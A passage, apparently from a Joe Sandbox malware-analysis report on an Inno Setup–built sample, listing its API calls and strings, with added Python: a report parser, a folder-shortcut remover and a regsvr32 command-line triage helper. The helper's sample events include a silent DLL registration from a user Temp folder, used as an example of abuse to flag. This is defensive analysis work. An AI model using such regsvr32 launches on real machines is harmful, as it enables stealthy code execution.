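                if key == "Instruction Fuzzy Hash":
                    current, section = None, None
    return records

def dynamically_resolved_imports(rec: FunctionRecord) -> List[str]:
    """Names handed to GetProcAddress: imports that never appear in the static import table."""
    return [a.args[-1] for a in rec.apis
            if a.name == "GetProcAddress" and a.args and a.args[-1] not in ("?", "00000000")]

def records_calling(records, required) -> List[FunctionRecord]:
    return [r for r in records if set(required) <= r.api_names]

# Constructed excerpt of three records from the report above (argument lists shortened).
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
Similarity
• Opcode ID: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
• Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458A99
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858), ref: 00458AF6
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858), ref: 00458B03
  • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005), ref: 00453473
Similarity
• Opcode ID: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
• Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
APIs
• FreeLibrary.KERNEL32(10000000), ref: 00480FD5
• SendNotifyMessageA.USER32(00020416,00000496,00002710,00000000), ref: 0048105B
Strings
• Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
• Restarting Windows., xrefs: 00481036
Similarity
• Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
• Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
"""
```

Run `parse_records` over a saved copy of the full listing and `records_calling(records, {"GetModuleHandleA", "GetProcAddress"})` returns every function that resolves imports by name; the Opcode ID in each record's meta is the stable key for correlating those functions across reports of other samples from the same builder.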
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD,?,?,00000000,00472D6C), ref: 00472804
                                                            • Part of subcall function 0042CD8C: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE02
                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD), ref: 0047287B
                                                          • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000), ref: 00472881
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                          • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                          • API String ID: 884541143-1710247218
                                                          • Opcode ID: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                          • Instruction ID: 279d6da86f281c7a9c803d865f3c4407023b84140d9db6ac64499a617a38ab60
                                                          • Opcode Fuzzy Hash: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                          • Instruction Fuzzy Hash: 8A11E270B005147BDB01F6658D82BAE73ACDB45754F62827BB804A72C1DB7C9E028A1E
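The API chain in the block above (GetFileAttributesA, GetPrivateProfileStringA, DeleteFileA, SetFileAttributesA, RemoveDirectoryA) together with its string set (.ShellClassInfo, CLSID2, desktop.ini, target.lnk, {0AFACED1-E828-11D1-9187-B532F1E9575D}) is the shape of a routine that recognises a Windows folder shortcut, a directory whose desktop.ini points CLSID2 at that CLSID with a target.lnk beside it, and removes just the shortcut's own files before deleting the directory. The following is an added example, not code from the sample, from Inno Setup or from Joe Sandbox; it assumes that reading of the strings, and the function names, the fixture builder and the fake .lnk bytes are mine.

```python
"""Recognise and remove a Windows 'folder shortcut' without recursing into real data."""
import configparser
import os
import tempfile

# CLSID_FolderShortcut, the value the block's string set names for CLSID2.
FOLDER_SHORTCUT_CLSID = "{0AFACED1-E828-11D1-9187-B532F1E9575D}"


def read_shell_class_info(desktop_ini_path: str) -> dict:
    """Return the [.ShellClassInfo] section of a desktop.ini as a dict.

    Mirrors GetPrivateProfileStringA: names are case-insensitive and a missing,
    unreadable or malformed file yields an empty result instead of an error.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    try:
        with open(desktop_ini_path, "r", encoding="utf-8", errors="replace") as fh:
            parser.read_file(fh)
    except (OSError, configparser.Error):
        return {}
    for section in parser.sections():
        if section.lower() == ".shellclassinfo":
            return {k.lower(): v for k, v in parser.items(section)}
    return {}


def is_folder_shortcut(directory: str) -> bool:
    """True only if desktop.ini names the folder-shortcut CLSID in CLSID2
    and a target.lnk sits next to it (both are required)."""
    info = read_shell_class_info(os.path.join(directory, "desktop.ini"))
    clsid2 = (info.get("clsid2") or "").strip().upper()
    has_target = os.path.isfile(os.path.join(directory, "target.lnk"))
    return clsid2 == FOLDER_SHORTCUT_CLSID and has_target


def remove_folder_shortcut(directory: str) -> bool:
    """Delete the shortcut's two files and then the (now empty) directory, in the
    same order as the API chain: clear attributes, DeleteFile, RemoveDirectory.
    Anything that is not a folder shortcut is refused, so a real data
    directory is never touched; RemoveDirectory fails if other files remain."""
    if not is_folder_shortcut(directory):
        return False
    for name in ("desktop.ini", "target.lnk"):
        path = os.path.join(directory, name)
        os.chmod(path, 0o666)  # SetFileAttributes: drop read-only before delete
        os.remove(path)        # DeleteFile
    try:
        os.rmdir(directory)    # RemoveDirectory: non-recursive by design
    except OSError:
        return False
    return True


def make_demo_shortcut(root: str, name: str, clsid: str = FOLDER_SHORTCUT_CLSID) -> str:
    """Constructed fixture (not a real shortcut): a directory with the two marker files."""
    d = os.path.join(root, name)
    os.makedirs(d, exist_ok=True)
    with open(os.path.join(d, "desktop.ini"), "w", encoding="utf-8") as fh:
        fh.write(f"[.ShellClassInfo]\nCLSID2={clsid}\nFlags=2\n")
    with open(os.path.join(d, "target.lnk"), "wb") as fh:
        fh.write(b"L\x00\x00\x00")  # placeholder bytes, not a parseable .lnk
    return d


def demo() -> dict:
    """Run the check against a constructed shortcut and a look-alike with a
    different CLSID2, and report what happened to each."""
    with tempfile.TemporaryDirectory() as tmp:
        shortcut = make_demo_shortcut(tmp, "Shortcut Folder")
        plain = make_demo_shortcut(tmp, "Plain Folder",
                                   clsid="{00000000-0000-0000-0000-000000000000}")
        return {
            "shortcut_detected": is_folder_shortcut(shortcut),
            "shortcut_removed": remove_folder_shortcut(shortcut),
            "shortcut_gone": not os.path.isdir(shortcut),
            "plain_detected": is_folder_shortcut(plain),
            "plain_removed": remove_folder_shortcut(plain),
            "plain_still_there": os.path.isdir(plain),
        }


if __name__ == "__main__":
    print(demo())
```

The point of the two-condition check is that a desktop.ini alone is not enough: ordinary folders carry desktop.ini for icons, and only the CLSID2 value plus target.lnk make the directory a folder shortcut that is safe to delete non-recursively.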
                                                          APIs
                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                          • LocalFree.KERNEL32(004F24E0,00000000,00401B68), ref: 00401ACF
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,004F24E0,00000000,00401B68), ref: 00401AEE
                                                          • LocalFree.KERNEL32(004F34E0,?,00000000,00008000,004F24E0,00000000,00401B68), ref: 00401B2D
                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                          • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                          • String ID: $O$4O
                                                          • API String ID: 3782394904-897905560
                                                          • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                          • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                          • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                          • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D0DD
                                                          • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D0ED
                                                          • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D0FD
                                                          • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D10D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                          • API String ID: 190572456-3516654456
                                                          • Opcode ID: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                          • Instruction ID: 76eb10cdb098e6f3740e4570fa0e0ca14f9d337f92906be3718b60d9f676c82f
                                                          • Opcode Fuzzy Hash: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                          • Instruction Fuzzy Hash: 800112B0D01B00DAE724DFB69DD572736A5ABA4306F10C13B9C49D62A2D77D0859DF2C
                                                          APIs
                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A9B1
                                                          • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9EB
                                                          • SetBkColor.GDI32(?,?), ref: 0041AA00
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA4A
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA55
                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA65
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAA4
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AAAE
                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AABB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Color$StretchText
                                                          • String ID:
                                                          • API String ID: 2984075790-0
                                                          • Opcode ID: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                          • Instruction ID: f35f62ab74b2522f6310a7e8d9a92b24202350a16c816e0881424610f10e5e30
                                                          • Opcode Fuzzy Hash: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                          • Instruction Fuzzy Hash: 9F61C7B5A00105AFCB40EFADD985E9EB7F8EF08314B1085AAF518DB262C735ED408F58
                                                          APIs
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458098,?, /s ",?,regsvr32.exe",?,00458098), ref: 0045800A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseDirectoryHandleSystem
                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                          • API String ID: 2051275411-1862435767
                                                          • Opcode ID: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                          • Instruction ID: 56a02eb2220928eb4cb829bb83c6f501b915172eb664170f25c545f5d36e4a23
                                                          • Opcode Fuzzy Hash: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                          • Instruction Fuzzy Hash: 80413670A003086BDB10EFE5D842B8EB7B9AF44705F50407FA904BB297DF789A0D8B19
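The strings in the block above (GetSystemDirectoryA, `regsvr32.exe"`, ` /s "`, ` /u`, "Spawning 32-bit RegSvr32: ", "Spawning 64-bit RegSvr32: ", CreateProcess) show the installer stub building a command line of the form `"<system dir>\regsvr32.exe" /s [/u] "<dll>"` and launching it silently, once per bitness. In process telemetry that launch is indistinguishable from the regsvr32 abuse a SOC hunts for unless the DLL's location is taken into account. The following is an added triage helper, not code from the sample, from Inno Setup or from Joe Sandbox; SAMPLE_EVENTS is constructed to match that command-line shape, and the allow-list, the verdict names and the WOW64 heuristic are my choices.

```python
"""Classify regsvr32 command lines of the shape "<sysdir>\\regsvr32.exe" /s [/u] "<dll>"."""
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed process-creation events: (command line, label). Not from the report.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r'"C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files (x86)\Vendor App\helper.dll"',
     "32-bit, silent register, DLL under Program Files (x86)"),
    (r'"C:\Windows\System32\regsvr32.exe" /s /u "C:\Program Files\Vendor App\helper64.dll"',
     "64-bit, silent unregister, DLL under Program Files"),
    (r'"C:\Windows\System32\regsvr32.exe" /s "C:\Users\alice\AppData\Local\Temp\installer\svc.dll"',
     "silent register of a DLL in a user-writable temp directory"),
    (r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt',
     "not regsvr32 at all"),
]

# Locations where a silently registered DLL is expected; subtrees of these that are
# user-writable are carved back out. Deliberately coarse; tune per estate.
TRUSTED_DLL_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
WRITABLE_EXCEPTIONS = ("c:\\windows\\temp\\", "c:\\windows\\tasks\\")


def split_windows_cmdline(cmd: str) -> List[str]:
    """Split on whitespace outside double quotes and drop the quotes.
    CommandLineToArgvW's backslash-escape rules are not modelled; the paths
    handled here contain no embedded quotes."""
    tokens, cur, in_quotes = [], [], False
    for ch in cmd:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


@dataclass
class RegSvr32Call:
    exe: str
    silent: bool        # /s: no success/failure dialog
    unregister: bool    # /u: DllUnregisterServer instead of DllRegisterServer
    dll: Optional[str]  # first positional argument, the module to (un)register
    wow64: bool         # launched from SysWOW64, i.e. the 32-bit copy


def parse_regsvr32(cmd: str) -> Optional[RegSvr32Call]:
    """Return the parsed call, or None when the process is not regsvr32.exe."""
    toks = split_windows_cmdline(cmd)
    if not toks or ntpath.basename(toks[0]).lower() != "regsvr32.exe":
        return None
    is_flag = lambda t: t.startswith("/") or t.startswith("-")   # regsvr32 accepts both
    flags = {t.lower().lstrip("/-") for t in toks[1:] if is_flag(t)}
    positional = [t for t in toks[1:] if not is_flag(t)]
    return RegSvr32Call(
        exe=toks[0],
        silent="s" in flags,
        unregister="u" in flags,
        dll=positional[0] if positional else None,
        wow64="\\syswow64\\" in toks[0].lower(),
    )


def dll_location_trusted(path: str) -> bool:
    p = path.lower()
    if p.startswith(WRITABLE_EXCEPTIONS):
        return False
    return p.startswith(TRUSTED_DLL_PREFIXES)


def triage(cmd: str) -> str:
    """'ignore' (not regsvr32), 'review' (no DLL path to judge, e.g. only /n /i:),
    'alert' (silent registration from an untrusted location) or 'info'."""
    call = parse_regsvr32(cmd)
    if call is None:
        return "ignore"
    if call.dll is None:
        return "review"
    if call.silent and not dll_location_trusted(call.dll):
        return "alert"
    return "info"


def run_all() -> List[Tuple[str, str]]:
    return [(label, triage(cmd)) for cmd, label in SAMPLE_EVENTS]


if __name__ == "__main__":
    for label, verdict in run_all():
        print(f"{verdict:6}  {label}")
```

The two launches the block describes (32-bit and 64-bit, DLL under the install directory) come out as "info"; the same command line with the DLL under a user-writable directory is what turns it into an alert, so the verdict rests on where the module lives rather than on regsvr32 or /s by themselves.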
                                                          APIs
                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A1
                                                          • GetSysColor.USER32(00000014), ref: 0044D1A8
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C0
                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1E9
                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1F3
                                                          • GetSysColor.USER32(00000010), ref: 0044D1FA
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D212
                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D23B
                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D266
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Text$Color$Draw$OffsetRect
                                                          • String ID:
                                                          • API String ID: 1005981011-0
                                                          • Opcode ID: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                          • Instruction ID: 3fa3981ec5684e07db84b004592342e93505d63b705e9416633fcf0049301179
                                                          • Opcode Fuzzy Hash: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                          • Instruction Fuzzy Hash: 6A21CEB46415047FC710FB2ACC8AE8BBBECDF19319B00457AB958EB392C678DE404668
                                                          APIs
                                                            • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495A91
                                                          • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495AA5
                                                          • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495ABF
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495ACB
                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AD1
                                                          • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AE4
                                                          Strings
                                                          • Deleting Uninstall data files., xrefs: 00495A07
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                          • String ID: Deleting Uninstall data files.
                                                          • API String ID: 1570157960-2568741658
                                                          • Opcode ID: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                          • Instruction ID: 8fd25edfc014547dd13852670f785c7791f766ba0082412c3ee421c8584d85d8
                                                          • Opcode Fuzzy Hash: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                          • Instruction Fuzzy Hash: 6D217371304610AFEB11E7A6ECC6B2736A8E758328F61453BB5019A1E2D67CAC04CB6C
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119,?,?,?,?,00000000), ref: 00470083
                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119), ref: 0047009A
                                                          • AddFontResourceA.GDI32(00000000), ref: 004700B7
                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004700CB
                                                          Strings
                                                          • Failed to open Fonts registry key., xrefs: 004700A1
                                                          • Failed to set value in Fonts registry key., xrefs: 0047008C
                                                          • AddFontResource, xrefs: 004700D5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                          • API String ID: 955540645-649663873
                                                          • Opcode ID: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                          • Instruction ID: 9e1cacd5bb0885738b58fd2773111f6953d7784f445270ce1bd520dac8ad2ca8
                                                          • Opcode Fuzzy Hash: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                          • Instruction Fuzzy Hash: 2921B270741240BBDB10EA669C42FAA77DDCB54708F508437B904EB3C2DA7DAE02966D
                                                          APIs
                                                            • Part of subcall function 00416408: GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                            • Part of subcall function 00416408: UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                            • Part of subcall function 00416408: RegisterClassA.USER32(?), ref: 004164C6
                                                          • GetVersion.KERNEL32 ref: 00462C88
                                                          • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462CC6
                                                          • SHGetFileInfo.SHELL32(00462D64,00000000,?,00000160,00004011), ref: 00462CE3
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462D01
                                                          • SetCursor.USER32(00000000,00000000,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D07
                                                          • SetCursor.USER32(?,00462D47,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                          • String ID: Explorer
                                                          • API String ID: 2594429197-512347832
                                                          • Opcode ID: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                          • Instruction ID: fc1c968538dd14d686f90bdc81855b9701391525be241791f09fb78c6da7bbf1
                                                          • Opcode Fuzzy Hash: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                          • Instruction Fuzzy Hash: 7A21E7717407047AE720BB768D47F9A3698DB09708F40047FBA09EF2D3D9BC880186AD
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
